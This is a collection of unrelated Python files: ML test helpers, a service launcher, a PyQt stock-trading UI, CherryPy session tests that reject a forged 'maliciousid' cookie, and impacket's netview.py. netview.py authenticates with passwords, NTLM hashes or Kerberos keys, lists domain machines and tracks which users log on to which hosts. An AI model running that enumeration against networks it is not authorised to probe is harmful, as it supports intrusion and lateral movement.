path_expt = os.path.join(path_dir, name, 'version_%s' % version)
# try if the new sub-folder exists, typical case for test-tube
if not os.path.isdir(path_expt):
path_expt = path_dir
return path_expt
def load_model_from_checkpoint(logger, root_weights_dir, module_class=EvalModelTemplate):
trained_model = module_class.load_from_checkpoint(root_weights_dir)
assert trained_model is not None, 'loading model failed'
return trained_model
def assert_ok_model_acc(trainer, key='test_acc', thr=0.5):
# this model should get 0.80+ acc
acc = trainer.callback_metrics[key]
assert acc > thr, f"Model failed to get expected {thr} accuracy. {key} = {acc}"
def reset_seed():
seed = RANDOM_SEEDS.pop()
seed_everything(seed)
def set_random_master_port():
reset_seed()
port = RANDOM_PORTS.pop()
os.environ['MASTER_PORT'] = str(port)
def init_checkpoint_callback(logger):
checkpoint = ModelCheckpoint(logger.save_dir)
return checkpoint
def pl_multi_process_test(func):
"""Wrapper for running multi-processing tests."""
@functools.wraps(func)
def wrapper(*args, **kwargs):
from multiprocessing import Process, Queue
queue = Queue()
def inner_f(queue, **kwargs):
try:
func(**kwargs)
queue.put(1)
except Exception:
import traceback
traceback.print_exc()
queue.put(-1)
proc = Process(target=inner_f, args=(queue,), kwargs=kwargs)
proc.start()
proc.join()
result = queue.get()
assert result == 1, 'expected 1, but returned %s' % result
return wrapper
|
__main__.py
|
from multiprocessing import Process
from cc_server.commons.configuration import Config
from cc_server.services.log.__main__ import main as log_main
from cc_server.services.master.__main__ import main as master_main
from cc_server.services.web.__main__ import main as web_main
from cc_server.services.files.__main__ import main as files_main
def main():
config = Config()
log = Process(target=log_main)
log.daemon = True
log.start()
master = Process(target=master_main)
master.daemon = True
master.start()
if config.server_files:
files = Process(target=files_main)
files.daemon = True
files.start()
web_main()
if __name__ == '__main__':
main()
|
netview.py
|
#!/usr/bin/env python
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Author:
# beto (@agsolino)
#
# Description:
# The idea of this script is to get a list of the sessions
# opened at the remote hosts and keep track of them.
# Coincidentally @mubix did something similar a few years
# ago so credit goes to him (and the script's name ;)).
# Check it out at https://github.com/mubix/netview
# The main difference with our approach is we keep
# looping over the hosts found and keep track of who logged
# in/out from remote servers. Plus, we keep the connections
# with the target systems and just send a few DCE-RPC packets.
#
# One VERY IMPORTANT thing is:
#
# YOU HAVE TO BE ABLE TO RESOLV THE DOMAIN MACHINES NETBIOS
# NAMES. That's usually solved by setting your DNS to the
# domain DNS (and the right search domain).
#
# Some examples of usage are:
#
# netview.py -target 192.168.1.10 beto
#
# This will show the sessions on 192.168.1.10 and will authenticate as 'beto'
# (password will be prompted)
#
# netview.py FREEFLY.NET/beto
#
# This will download all machines from FREEFLY.NET, authenticated as 'beto'
# and will gather the session information for those machines that appear
# to be up. There is a background thread checking aliveness of the targets
# at all times.
#
# netview.py -users /tmp/users -dc-ip freefly-dc.freefly.net -k FREEFLY.NET/beto
#
# This will download all machines from FREEFLY.NET, authenticating using
# Kerberos (that's why -dc-ip parameter is needed), and filter
# the output based on the list of users specified in /tmp/users file.
#
#
from __future__ import division
from __future__ import print_function
import sys
import argparse
import logging
import socket
from threading import Thread, Event
from queue import Queue
from time import sleep
from impacket.examples import logger
from impacket import version
from impacket.smbconnection import SessionError
from impacket.dcerpc.v5 import transport, wkst, srvs, samr
from impacket.dcerpc.v5.ndr import NULL
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.nt_errors import STATUS_MORE_ENTRIES
machinesAliveQueue = Queue()
machinesDownQueue = Queue()
myIP = None
def checkMachines(machines, stopEvent, singlePass=False):
origLen = len(machines)
deadMachines = machines
done = False
while not done:
if stopEvent.is_set():
done = True
break
for machine in deadMachines:
s = socket.socket()
try:
s = socket.create_connection((machine, 445), 2)
global myIP
myIP = s.getsockname()[0]
s.close()
machinesAliveQueue.put(machine)
except Exception as e:
logging.debug('%s: not alive (%s)' % (machine, e))
pass
else:
logging.debug('%s: alive!' % machine)
deadMachines.remove(machine)
if stopEvent.is_set():
done = True
break
logging.debug('up: %d, down: %d, total: %d' % (origLen-len(deadMachines), len(deadMachines), origLen))
if singlePass is True:
done = True
if not done:
sleep(10)
# Do we have some new deadMachines to add?
while machinesDownQueue.empty() is False:
deadMachines.append(machinesDownQueue.get())
class USERENUM:
def __init__(self, username='', password='', domain='', hashes=None, aesKey=None, doKerberos=False, options=None):
self.__username = username
self.__password = password
self.__domain = domain
self.__lmhash = ''
self.__nthash = ''
self.__aesKey = aesKey
self.__doKerberos = doKerberos
self.__kdcHost = options.dc_ip
self.__options = options
self.__machinesList = list()
self.__targets = dict()
self.__filterUsers = None
self.__targetsThreadEvent = None
self.__targetsThread = None
self.__maxConnections = int(options.max_connections)
if hashes is not None:
self.__lmhash, self.__nthash = hashes.split(':')
def getDomainMachines(self):
if self.__kdcHost is not None:
domainController = self.__kdcHost
elif self.__domain != '':
domainController = self.__domain
else:
raise Exception('A domain is needed!')
logging.info('Getting machine\'s list from %s' % domainController)
rpctransport = transport.SMBTransport(domainController, 445, r'\samr', self.__username, self.__password,
self.__domain, self.__lmhash, self.__nthash, self.__aesKey,
doKerberos=self.__doKerberos, kdcHost = self.__kdcHost)
dce = rpctransport.get_dce_rpc()
dce.connect()
dce.bind(samr.MSRPC_UUID_SAMR)
try:
resp = samr.hSamrConnect(dce)
serverHandle = resp['ServerHandle']
resp = samr.hSamrEnumerateDomainsInSamServer(dce, serverHandle)
domains = resp['Buffer']['Buffer']
logging.info("Looking up users in domain %s" % domains[0]['Name'])
resp = samr.hSamrLookupDomainInSamServer(dce, serverHandle,domains[0]['Name'] )
resp = samr.hSamrOpenDomain(dce, serverHandle = serverHandle, domainId = resp['DomainId'])
domainHandle = resp['DomainHandle']
status = STATUS_MORE_ENTRIES
enumerationContext = 0
while status == STATUS_MORE_ENTRIES:
try:
resp = samr.hSamrEnumerateUsersInDomain(dce, domainHandle, samr.USER_WORKSTATION_TRUST_ACCOUNT,
enumerationContext=enumerationContext)
except DCERPCException as e:
if str(e).find('STATUS_MORE_ENTRIES') < 0:
raise
resp = e.get_packet()
for user in resp['Buffer']['Buffer']:
self.__machinesList.append(user['Name'][:-1])
logging.debug('Machine name - rid: %s - %d'% (user['Name'], user['RelativeId']))
enumerationContext = resp['EnumerationContext']
status = resp['ErrorCode']
except Exception as e:
raise e
dce.disconnect()
def getTargets(self):
logging.info('Importing targets')
if self.__options.target is None and self.__options.targets is None:
# We need to download the list of machines from the domain
self.getDomainMachines()
elif self.__options.targets is not None:
for line in self.__options.targets.readlines():
self.__machinesList.append(line.strip(' \r\n'))
else:
# Just a single machine
self.__machinesList.append(self.__options.target)
logging.info("Got %d machines" % len(self.__machinesList))
def filterUsers(self):
if self.__options.user is not None:
self.__filterUsers = list()
self.__filterUsers.append(self.__options.user)
elif self.__options.users is not None:
# Grab users list from a file
self.__filterUsers = list()
for line in self.__options.users.readlines():
self.__filterUsers.append(line.strip(' \r\n'))
else:
self.__filterUsers = None
def run(self):
self.getTargets()
self.filterUsers()
#self.filterGroups()
# Up to here we should have figured out the scope of our work
self.__targetsThreadEvent = Event()
if self.__options.noloop is False:
# Start a separate thread checking the targets that are up
self.__targetsThread = Thread(target=checkMachines, args=(self.__machinesList,self.__targetsThreadEvent))
self.__targetsThread.start()
else:
# Since it's gonna be a one shoot test, we need to wait till it finishes
checkMachines(self.__machinesList,self.__targetsThreadEvent, singlePass=True)
while True:
# Do we have more machines to add?
while machinesAliveQueue.empty() is False:
machine = machinesAliveQueue.get()
logging.debug('Adding %s to the up list' % machine)
self.__targets[machine] = {}
self.__targets[machine]['SRVS'] = None
self.__targets[machine]['WKST'] = None
self.__targets[machine]['Admin'] = True
self.__targets[machine]['Sessions'] = list()
self.__targets[machine]['LoggedIn'] = set()
for target in list(self.__targets.keys()):
try:
self.getSessions(target)
self.getLoggedIn(target)
except (SessionError, DCERPCException) as e:
# We will silently pass these ones, might be issues with Kerberos, or DCE
if str(e).find('LOGON_FAILURE') >=0:
# For some reason our credentials don't work there,
# taking it out from the list.
logging.error('STATUS_LOGON_FAILURE for %s, discarding' % target)
del(self.__targets[target])
elif str(e).find('INVALID_PARAMETER') >=0:
del(self.__targets[target])
elif str(e).find('access_denied') >=0:
# Can't access the target RPC call, most probably a Unix host
# taking it out from the list
del(self.__targets[target])
else:
logging.info(str(e))
pass
except KeyboardInterrupt:
raise
except Exception as e:
#import traceback
#traceback.print_exc()
if str(e).find('timed out') >=0:
# Most probably this site went down. taking it out
# ToDo: add it back to the list of machines to check in
# the separate thread - DONE
del(self.__targets[target])
machinesDownQueue.put(target)
else:
# These ones we will report
logging.error(e)
pass
if self.__options.noloop is True:
break
logging.debug('Sleeping for %s seconds' % self.__options.delay)
logging.debug('Currently monitoring %d active targets' % len(self.__targets))
sleep(int(self.__options.delay))
def getSessions(self, target):
if self.__targets[target]['SRVS'] is None:
stringSrvsBinding = r'ncacn_np:%s[\PIPE\srvsvc]' % target
rpctransportSrvs = transport.DCERPCTransportFactory(stringSrvsBinding)
if hasattr(rpctransportSrvs, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransportSrvs.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash,
self.__nthash, self.__aesKey)
rpctransportSrvs.set_kerberos(self.__doKerberos, self.__kdcHost)
dce = rpctransportSrvs.get_dce_rpc()
dce.connect()
dce.bind(srvs.MSRPC_UUID_SRVS)
self.__maxConnections -= 1
else:
dce = self.__targets[target]['SRVS']
try:
resp = srvs.hNetrSessionEnum(dce, '\x00', NULL, 10)
except Exception as e:
if str(e).find('Broken pipe') >= 0:
# The connection timed-out. Let's try to bring it back next round
self.__targets[target]['SRVS'] = None
self.__maxConnections += 1
return
else:
raise
if self.__maxConnections < 0:
# Can't keep this connection open. Closing it
dce.disconnect()
self.__maxConnections = 0
else:
self.__targets[target]['SRVS'] = dce
# Let's see who createad a connection since last check
tmpSession = list()
printCRLF = False
for session in resp['InfoStruct']['SessionInfo']['Level10']['Buffer']:
userName = session['sesi10_username'][:-1]
sourceIP = session['sesi10_cname'][:-1][2:]
key = '%s\x01%s' % (userName, sourceIP)
myEntry = '%s\x01%s' % (self.__username, myIP)
tmpSession.append(key)
if not(key in self.__targets[target]['Sessions']):
# Skipping myself
if key != myEntry:
self.__targets[target]['Sessions'].append(key)
# Are we filtering users?
if self.__filterUsers is not None:
if userName in self.__filterUsers:
print("%s: user %s logged from host %s - active: %d, idle: %d" % (
target, userName, sourceIP, session['sesi10_time'], session['sesi10_idle_time']))
printCRLF = True
else:
print("%s: user %s logged from host %s - active: %d, idle: %d" % (
target, userName, sourceIP, session['sesi10_time'], session['sesi10_idle_time']))
printCRLF = True
# Let's see who deleted a connection since last check
for nItem, session in enumerate(self.__targets[target]['Sessions']):
userName, sourceIP = session.split('\x01')
if session not in tmpSession:
del(self.__targets[target]['Sessions'][nItem])
# Are we filtering users?
if self.__filterUsers is not None:
if userName in self.__filterUsers:
print("%s: user %s logged off from host %s" % (target, userName, sourceIP))
printCRLF=True
else:
print("%s: user %s logged off from host %s" % (target, userName, sourceIP))
printCRLF=True
if printCRLF is True:
print()
def getLoggedIn(self, target):
if self.__targets[target]['Admin'] is False:
return
if self.__targets[target]['WKST'] is None:
stringWkstBinding = r'ncacn_np:%s[\PIPE\wkssvc]' % target
rpctransportWkst = transport.DCERPCTransportFactory(stringWkstBinding)
if hasattr(rpctransportWkst, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransportWkst.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash,
self.__nthash, self.__aesKey)
rpctransportWkst.set_kerberos(self.__doKerberos, self.__kdcHost)
dce = rpctransportWkst.get_dce_rpc()
dce.connect()
dce.bind(wkst.MSRPC_UUID_WKST)
self.__maxConnections -= 1
else:
dce = self.__targets[target]['WKST']
try:
resp = wkst.hNetrWkstaUserEnum(dce,1)
except Exception as e:
if str(e).find('Broken pipe') >= 0:
# The connection timed-out. Let's try to bring it back next round
self.__targets[target]['WKST'] = None
self.__maxConnections += 1
return
elif str(e).upper().find('ACCESS_DENIED'):
# We're not admin, bye
dce.disconnect()
self.__maxConnections += 1
self.__targets[target]['Admin'] = False
return
else:
raise
if self.__maxConnections < 0:
# Can't keep this connection open. Closing it
dce.disconnect()
self.__maxConnections = 0
else:
self.__targets[target]['WKST'] = dce
# Let's see who looged in locally since last check
tmpLoggedUsers = set()
printCRLF = False
for session in resp['UserInfo']['WkstaUserInfo']['Level1']['Buffer']:
userName = session['wkui1_username'][:-1]
logonDomain = session['wkui1_logon_domain'][:-1]
key = '%s\x01%s' % (userName, logonDomain)
tmpLoggedUsers.add(key)
if not(key in self.__targets[target]['LoggedIn']):
self.__targets[target]['LoggedIn'].add(key)
# Are we filtering users?
if self.__filterUsers is not None:
if userName in self.__filterUsers:
print("%s: user %s\\%s logged in LOCALLY" % (target,logonDomain,userName))
printCRLF=True
else:
print("%s: user %s\\%s logged in LOCALLY" % (target,logonDomain,userName))
printCRLF=True
# Let's see who logged out since last check
for session in self.__targets[target]['LoggedIn'].copy():
userName, logonDomain = session.split('\x01')
if session not in tmpLoggedUsers:
self.__targets[target]['LoggedIn'].remove(session)
# Are we filtering users?
if self.__filterUsers is not None:
if userName in self.__filterUsers:
print("%s: user %s\\%s logged off LOCALLY" % (target,logonDomain,userName))
printCRLF=True
else:
print("%s: user %s\\%s logged off LOCALLY" % (target,logonDomain,userName))
printCRLF=True
if printCRLF is True:
print()
def stop(self):
if self.__targetsThreadEvent is not None:
self.__targetsThreadEvent.set()
# Process command-line arguments.
if __name__ == '__main__':
print(version.BANNER)
parser = argparse.ArgumentParser()
parser.add_argument('identity', action='store', help='[domain/]username[:password]')
parser.add_argument('-user', action='store', help='Filter output by this user')
parser.add_argument('-users', type=argparse.FileType('r'), help='input file with list of users to filter to output for')
#parser.add_argument('-group', action='store', help='Filter output by members of this group')
#parser.add_argument('-groups', type=argparse.FileType('r'), help='Filter output by members of the groups included in the input file')
parser.add_argument('-target', action='store', help='target system to query info from. If not specified script will '
'run in domain mode.')
parser.add_argument('-targets', type=argparse.FileType('r'), help='input file with targets system to query info '
'from (one per line). If not specified script will run in domain mode.')
parser.add_argument('-noloop', action='store_true', default=False, help='Stop after the first probe')
parser.add_argument('-delay', action='store', default = '10', help='seconds delay between starting each batch probe '
'(default 10 seconds)')
parser.add_argument('-max-connections', action='store', default='1000', help='Max amount of connections to keep '
'opened (default 1000)')
parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
group = parser.add_argument_group('authentication')
group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
'(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the '
'ones specified in the command line')
group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication '
'(128 or 256 bits)')
group.add_argument('-dc-ip', action='store',metavar = "ip address", help='IP Address of the domain controller. If '
'ommited it use the domain part (FQDN) specified in the target parameter')
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
options = parser.parse_args()
# Init the example's logger theme
logger.init(options.ts)
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
# Print the Library's installation path
logging.debug(version.getInstallationPath())
else:
logging.getLogger().setLevel(logging.INFO)
import re
domain, username, password = re.compile('(?:(?:([^/:]*)/)?([^:]*)(?::(.*))?)?').match(options.identity).groups(
'')
try:
if domain is None:
domain = ''
if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
from getpass import getpass
password = getpass("Password:")
if options.aesKey is not None:
options.k = True
executer = USERENUM(username, password, domain, options.hashes, options.aesKey, options.k, options)
executer.run()
except Exception as e:
if logging.getLogger().level == logging.DEBUG:
import traceback
traceback.print_exc()
logging.error(e)
executer.stop()
except KeyboardInterrupt:
logging.info('Quitting.. please wait')
executer.stop()
sys.exit(0)
|
UI.py
|
# coding: utf-8
import sys
from PyQt5 import QtWidgets
from PyQt5 import uic
from PyQt5.QtCore import pyqtSlot
from env.Strategies import *
from run import main as program
from pathlib import Path
import os
import threading
import matplotlib.pyplot as plt
os.environ['KMP_DUPLICATE_LIB_OK'] = 'True'
class Form(QtWidgets.QDialog):
def __init__(self, parent=None):
QtWidgets.QDialog.__init__(self, parent)
self.ui = uic.loadUi("mainWindow.ui", self)
self.weight_path = None # 현재 선택된 모델이 담긴 폴더 TODO 모델 파일? 폴더?
self.info = ['없음','비실행중'] # ['현재 모델파일', '학습/테스트 메시지']
self.portpolio_value_history = [] # 학습/테스트 스레드가 남길 히스토리배열
self.setInfo("없음")
self.running = None
self.ui.show()
self.tradingList.addItems([ func['name'] for func in strategies]) # 트레이딩 알고리즘 메뉴 등록
data_list = [ elem.name for elem in Path('../daily_data').iterdir() if elem.is_dir() ]
self.subjectList.addItems(data_list) # 종목 선택 메뉴 등록 TODO Ui에 종목 등록 유언성 필요
self.viewSubjectList.addItems(data_list) # 지표 선택 메뉴 등록 TODO Ui에 종목 등록 유언성 필요
self.selected_subject = [data_list[0], [data_list[0],]] # 현재 선택된 종목
self.selected_trading = [] # 현재 선택된 알고리즘
self.selected_learn = 'ppo' # 현재 선택된 강화학습방식, ppo or dqn
# 기본값 설정
self.subjectList.itemAt(0,0).setSelected(True)
self.viewSubjectList.itemAt(0,0).setSelected(True)
def setInfo(self, file=None, msg=None):
# UI의 메시지 업데이트
baseText = "현재 로드된 모델 파일 : {}\n마지막 메시지\n: {}"
self.info[0] = file if not file is None else self.info[0]
self.info[1] = msg if not msg is None else self.info[1]
self.ui.modelInfoLabel.setText(baseText.format(*self.info))
#이벤트 슬롯 구현
@pyqtSlot()
def ppoSelect(self):
''' PPO 선택 이벤트핸들러'''
self.selected_learn = 'ppo'
print("sel ppo")
@pyqtSlot()
def dqnSelect(self):
''' DQN 선택 이벤트핸들러'''
self.selected_learn = 'dqn'
print("sel dqn")
@pyqtSlot()
def changedTrading(self):
''' 기존에 구현된 알고리즘 트레이딩 전략 선택 이벤트핸들러'''
self.selected_trading = strategies_name_filter([elem.text() for elem in self.tradingList.selectedItems()])
print(self.selected_trading)
@pyqtSlot()
def changedSubject(self):
''' 모델에 필요한 지표 및 트레이딩 종목선택 이벤트핸들러'''
self.selected_subject = [
self.subjectList.selectedItems()[0].text(),
[ elem.text() for elem in self.viewSubjectList.selectedItems() ],
]
print(self.selected_subject)
@pyqtSlot()
def selectModelPath(self):
self.weight_path = QtWidgets.QFileDialog.getExistingDirectory(self, 'Select Model Path')
print(self.weight_path)
if self.weight_path!= "":
dir_name = self.weight_path.split('/')[-1]
self.setInfo(file=dir_name)
else:
self.weight_path = None
self.setInfo(file="없음")
print(self.episodesTextBox.toPlainText())
@pyqtSlot()
def modelTraining(self):
if not self.running is None and self.running.is_alive():
return
self.portpolio_value_history = []
episodes_text : str = self.episodesTextBox.toPlainText()
if episodes_text.isnumeric():
episodes = int(episodes_text)
else:
episodes = 100
kwargs=dict(
mode='train',
episode=episodes,
window_size=30,
init_invest=100*10000,
model_path=self.weight_path,
addition_train=self.additionalCheckBox.isChecked(),
selected_learn=self.selected_learn,
selected_trading=self.selected_trading,
selected_subject=self.selected_subject,
ui_windows=self,
)
# run_program
self.running = threading.Thread(target=program, kwargs=kwargs)
self.running.daemon = True
self.running.start()
self.setInfo(msg='학습시작.')
@pyqtSlot()
def modelTest(self):
if not self.running is None and self.running.is_alive():
return
self.portpolio_value_history = []
if self.weight_path is None:
self.setInfo(msg="트레이딩을 하기 위해 학습된 모델을 로드해주세요.")
return
episodes_text : str = self.episodesTextBox.toPlainText()
if episodes_text.isnumeric():
episodes = int(episodes_text)
else:
episodes = 100
kwargs=dict(
mode='test',
episode=episodes,
window_size=30,
init_invest=100*10000,
model_path=self.weight_path,
addition_train=False,
selected_learn=self.selected_learn,
selected_trading=self.selected_trading,
selected_subject=self.selected_subject,
ui_windows=self,
)
# run_program
self.running = threading.Thread(target=program, kwargs=kwargs)
self.running.daemon = True
self.running.start()
self.setInfo(msg="가상트레이딩 시작.")
@pyqtSlot()
def showGraph(self):
print("portfolio", self.portpolio_value_history)
plt.plot(self.portpolio_value_history)
plt.ylabel("포트폴리오 가치")
plt.show()
if __name__ == '__main__':
app = QtWidgets.QApplication(sys.argv)
window = Form()
sys.exit(app.exec())
|
test_session.py
|
import os
import threading
import time
import socket
import pytest
import cherrypy
from cherrypy._cpcompat import (
copykeys, json_decode,
HTTPConnection, HTTPSConnection
)
from cherrypy.lib import sessions
from cherrypy.lib import reprconf
from cherrypy.lib.httputil import response_codes
from cherrypy.test import helper
localDir = os.path.dirname(__file__)
def http_methods_allowed(methods=['GET', 'HEAD']):
method = cherrypy.request.method.upper()
if method not in methods:
cherrypy.response.headers['Allow'] = ', '.join(methods)
raise cherrypy.HTTPError(405)
cherrypy.tools.allow = cherrypy.Tool('on_start_resource', http_methods_allowed)
def setup_server():
@cherrypy.config(**{
'tools.sessions.on': True,
'tools.sessions.storage_class': sessions.RamSession,
'tools.sessions.storage_path': localDir,
'tools.sessions.timeout': (1.0 / 60),
'tools.sessions.clean_freq': (1.0 / 60),
})
class Root:
@cherrypy.expose
def clear(self):
cherrypy.session.cache.clear()
@cherrypy.expose
def data(self):
cherrypy.session['aha'] = 'foo'
return repr(cherrypy.session._data)
@cherrypy.expose
def testGen(self):
counter = cherrypy.session.get('counter', 0) + 1
cherrypy.session['counter'] = counter
yield str(counter)
@cherrypy.expose
def testStr(self):
counter = cherrypy.session.get('counter', 0) + 1
cherrypy.session['counter'] = counter
return str(counter)
@cherrypy.expose
@cherrypy.config(**{'tools.sessions.on': False})
def set_session_cls(self, new_cls_name):
new_cls = reprconf.attributes(new_cls_name)
cfg = {'tools.sessions.storage_class': new_cls}
self.__class__._cp_config.update(cfg)
if hasattr(cherrypy, 'session'):
del cherrypy.session
if new_cls.clean_thread:
new_cls.clean_thread.stop()
new_cls.clean_thread.unsubscribe()
del new_cls.clean_thread
@cherrypy.expose
def index(self):
sess = cherrypy.session
c = sess.get('counter', 0) + 1
time.sleep(0.01)
sess['counter'] = c
return str(c)
@cherrypy.expose
def keyin(self, key):
return str(key in cherrypy.session)
@cherrypy.expose
def delete(self):
cherrypy.session.delete()
sessions.expire()
return 'done'
@cherrypy.expose
def delkey(self, key):
del cherrypy.session[key]
return 'OK'
@cherrypy.expose
def redir_target(self):
return self._cp_config['tools.sessions.storage_class'].__name__
@cherrypy.expose
def iredir(self):
raise cherrypy.InternalRedirect('/redir_target')
@cherrypy.expose
@cherrypy.config(**{
'tools.allow.on': True,
'tools.allow.methods': ['GET'],
})
def restricted(self):
return cherrypy.request.method
@cherrypy.expose
def regen(self):
cherrypy.tools.sessions.regenerate()
return 'logged in'
@cherrypy.expose
def length(self):
return str(len(cherrypy.session))
@cherrypy.expose
@cherrypy.config(**{
'tools.sessions.path': '/session_cookie',
'tools.sessions.name': 'temp',
'tools.sessions.persistent': False,
})
def session_cookie(self):
# Must load() to start the clean thread.
cherrypy.session.load()
return cherrypy.session.id
cherrypy.tree.mount(Root())
class SessionTest(helper.CPWebCase):
setup_server = staticmethod(setup_server)
def tearDown(self):
# Clean up sessions.
for fname in os.listdir(localDir):
if fname.startswith(sessions.FileSession.SESSION_PREFIX):
os.unlink(os.path.join(localDir, fname))
@pytest.mark.xfail(reason='#1534')
def test_0_Session(self):
self.getPage('/set_session_cls/cherrypy.lib.sessions.RamSession')
self.getPage('/clear')
# Test that a normal request gets the same id in the cookies.
# Note: this wouldn't work if /data didn't load the session.
self.getPage('/data')
self.assertBody("{'aha': 'foo'}")
c = self.cookies[0]
self.getPage('/data', self.cookies)
self.assertEqual(self.cookies[0], c)
self.getPage('/testStr')
self.assertBody('1')
cookie_parts = dict([p.strip().split('=')
for p in self.cookies[0][1].split(';')])
# Assert there is an 'expires' param
self.assertEqual(set(cookie_parts.keys()),
set(['session_id', 'expires', 'Path']))
self.getPage('/testGen', self.cookies)
self.assertBody('2')
self.getPage('/testStr', self.cookies)
self.assertBody('3')
self.getPage('/data', self.cookies)
self.assertDictEqual(json_decode(self.body),
{'counter': 3, 'aha': 'foo'})
self.getPage('/length', self.cookies)
self.assertBody('2')
self.getPage('/delkey?key=counter', self.cookies)
self.assertStatus(200)
self.getPage('/set_session_cls/cherrypy.lib.sessions.FileSession')
self.getPage('/testStr')
self.assertBody('1')
self.getPage('/testGen', self.cookies)
self.assertBody('2')
self.getPage('/testStr', self.cookies)
self.assertBody('3')
self.getPage('/delkey?key=counter', self.cookies)
self.assertStatus(200)
# Wait for the session.timeout (1 second)
time.sleep(2)
self.getPage('/')
self.assertBody('1')
self.getPage('/length', self.cookies)
self.assertBody('1')
# Test session __contains__
self.getPage('/keyin?key=counter', self.cookies)
self.assertBody('True')
cookieset1 = self.cookies
# Make a new session and test __len__ again
self.getPage('/')
self.getPage('/length', self.cookies)
self.assertBody('2')
# Test session delete
self.getPage('/delete', self.cookies)
self.assertBody('done')
self.getPage('/delete', cookieset1)
self.assertBody('done')
f = lambda: [
x for x in os.listdir(localDir) if x.startswith('session-')]
self.assertEqual(f(), [])
# Wait for the cleanup thread to delete remaining session files
self.getPage('/')
f = lambda: [
x for x in os.listdir(localDir) if x.startswith('session-')]
self.assertNotEqual(f(), [])
time.sleep(2)
self.assertEqual(f(), [])
def test_1_Ram_Concurrency(self):
self.getPage('/set_session_cls/cherrypy.lib.sessions.RamSession')
self._test_Concurrency()
@pytest.mark.xfail(reason='#1306')
def test_2_File_Concurrency(self):
self.getPage('/set_session_cls/cherrypy.lib.sessions.FileSession')
self._test_Concurrency()
def _test_Concurrency(self):
client_thread_count = 5
request_count = 30
# Get initial cookie
self.getPage('/')
self.assertBody('1')
cookies = self.cookies
data_dict = {}
errors = []
def request(index):
if self.scheme == 'https':
c = HTTPSConnection('%s:%s' % (self.interface(), self.PORT))
else:
c = HTTPConnection('%s:%s' % (self.interface(), self.PORT))
for i in range(request_count):
c.putrequest('GET', '/')
for k, v in cookies:
c.putheader(k, v)
c.endheaders()
response = c.getresponse()
body = response.read()
if response.status != 200 or not body.isdigit():
errors.append((response.status, body))
else:
data_dict[index] = max(data_dict[index], int(body))
# Uncomment the following line to prove threads overlap.
## sys.stdout.write("%d " % index)
# Start <request_count> requests from each of
# <client_thread_count> concurrent clients
ts = []
for c in range(client_thread_count):
data_dict[c] = 0
t = threading.Thread(target=request, args=(c,))
ts.append(t)
t.start()
for t in ts:
t.join()
hitcount = max(data_dict.values())
expected = 1 + (client_thread_count * request_count)
for e in errors:
print(e)
self.assertEqual(hitcount, expected)
def test_3_Redirect(self):
# Start a new session
self.getPage('/testStr')
self.getPage('/iredir', self.cookies)
self.assertBody('FileSession')
@pytest.mark.xfail(reason='#1540')
def test_4_File_deletion(self):
# Start a new session
self.getPage('/testStr')
# Delete the session file manually and retry.
id = self.cookies[0][1].split(';', 1)[0].split('=', 1)[1]
path = os.path.join(localDir, 'session-' + id)
os.unlink(path)
self.getPage('/testStr', self.cookies)
def test_5_Error_paths(self):
self.getPage('/unknown/page')
self.assertErrorPage(404, "The path '/unknown/page' was not found.")
# Note: this path is *not* the same as above. The above
# takes a normal route through the session code; this one
# skips the session code's before_handler and only calls
# before_finalize (save) and on_end (close). So the session
# code has to survive calling save/close without init.
self.getPage('/restricted', self.cookies, method='POST')
self.assertErrorPage(405, response_codes[405][1])
def test_6_regenerate(self):
self.getPage('/testStr')
# grab the cookie ID
id1 = self.cookies[0][1].split(';', 1)[0].split('=', 1)[1]
self.getPage('/regen')
self.assertBody('logged in')
id2 = self.cookies[0][1].split(';', 1)[0].split('=', 1)[1]
self.assertNotEqual(id1, id2)
self.getPage('/testStr')
# grab the cookie ID
id1 = self.cookies[0][1].split(';', 1)[0].split('=', 1)[1]
self.getPage('/testStr',
headers=[
('Cookie',
'session_id=maliciousid; '
'expires=Sat, 27 Oct 2017 04:18:28 GMT; Path=/;')])
id2 = self.cookies[0][1].split(';', 1)[0].split('=', 1)[1]
self.assertNotEqual(id1, id2)
self.assertNotEqual(id2, 'maliciousid')
def test_7_session_cookies(self):
self.getPage('/set_session_cls/cherrypy.lib.sessions.RamSession')
self.getPage('/clear')
self.getPage('/session_cookie')
# grab the cookie ID
cookie_parts = dict([p.strip().split('=')
for p in self.cookies[0][1].split(';')])
# Assert there is no 'expires' param
self.assertEqual(set(cookie_parts.keys()), set(['temp', 'Path']))
id1 = cookie_parts['temp']
self.assertEqual(copykeys(sessions.RamSession.cache), [id1])
# Send another request in the same "browser session".
self.getPage('/session_cookie', self.cookies)
cookie_parts = dict([p.strip().split('=')
for p in self.cookies[0][1].split(';')])
# Assert there is no 'expires' param
self.assertEqual(set(cookie_parts.keys()), set(['temp', 'Path']))
self.assertBody(id1)
self.assertEqual(copykeys(sessions.RamSession.cache), [id1])
# Simulate a browser close by just not sending the cookies
self.getPage('/session_cookie')
# grab the cookie ID
cookie_parts = dict([p.strip().split('=')
for p in self.cookies[0][1].split(';')])
# Assert there is no 'expires' param
self.assertEqual(set(cookie_parts.keys()), set(['temp', 'Path']))
# Assert a new id has been generated...
id2 = cookie_parts['temp']
self.assertNotEqual(id1, id2)
self.assertEqual(set(sessions.RamSession.cache.keys()),
set([id1, id2]))
# Wait for the session.timeout on both sessions
time.sleep(2.5)
cache = copykeys(sessions.RamSession.cache)
if cache:
if cache == [id2]:
self.fail('The second session did not time out.')
else:
self.fail('Unknown session id in cache: %r', cache)
def test_8_Ram_Cleanup(self):
def lock():
s1 = sessions.RamSession()
s1.acquire_lock()
